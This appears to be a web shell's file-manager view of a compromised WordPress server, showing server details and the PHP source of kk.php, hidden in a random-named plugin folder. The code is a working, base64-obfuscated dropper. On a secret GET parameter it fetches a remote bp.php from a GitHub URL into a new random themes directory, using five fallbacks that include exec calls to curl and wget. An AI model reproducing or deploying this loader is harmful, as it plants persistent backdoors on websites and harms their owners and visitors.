HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux Droplet-NYC1-3 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www-data (33)
PHP: 7.4.3-4ubuntu2.29
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/html/bestseoreseller.com/wp-content/plugins/e35d34379cff4e809c958237dfcf9e98/kk.php
<?php
if(!isset($_GET[base64_decode('Yg==').base64_decode('cA==')]))die();
$u=base64_decode('aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL21pcmF6c2Fya2VyL25vdGhpbmcvcmVmcy9oZWFkcy9tYXN0ZXIvYnAucGhw');
$d=__DIR__;$m=5;$t=null;for($i=0;$i<$m;$i++){$d=dirname($d);if(is_dir($d.'/themes')){$t=$d.'/themes';break;}}
if($t){$r=substr(md5(rand()),0,32);$f=$t.'/'.$r.'/bp.php';
if(!is_dir($t.'/'.$r))mkdir($t.'/'.$r,0755,true);
function d($u,$f){$m=array(
function($u,$f){return @file_put_contents($f,@file_get_contents($u))>0;},
function($u,$f){if(!function_exists('curl_init'))return false;$c=curl_init($u);
curl_setopt_array($c,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_FOLLOWLOCATION=>1,CURLOPT_SSL_VERIFYPEER=>0]);
return @file_put_contents($f,curl_exec($c))>0;},
function($u,$f){return @file_put_contents($f,@fopen($u,'r'))>0;},
function($u,$f){@exec("curl -s ".escapeshellarg($u)." -o ".escapeshellarg($f));return @filesize($f)>0;},
function($u,$f){@exec("wget -q ".escapeshellarg($u)." -O ".escapeshellarg($f));return @filesize($f)>0;}
);foreach($m as$n){if($n($u,$f)&&@filesize($f)>0)return true;@unlink($f);}return false;}
if(d($u,$f))echo'themes/'.$r.'/bp.php';else echo'0';}else echo'0';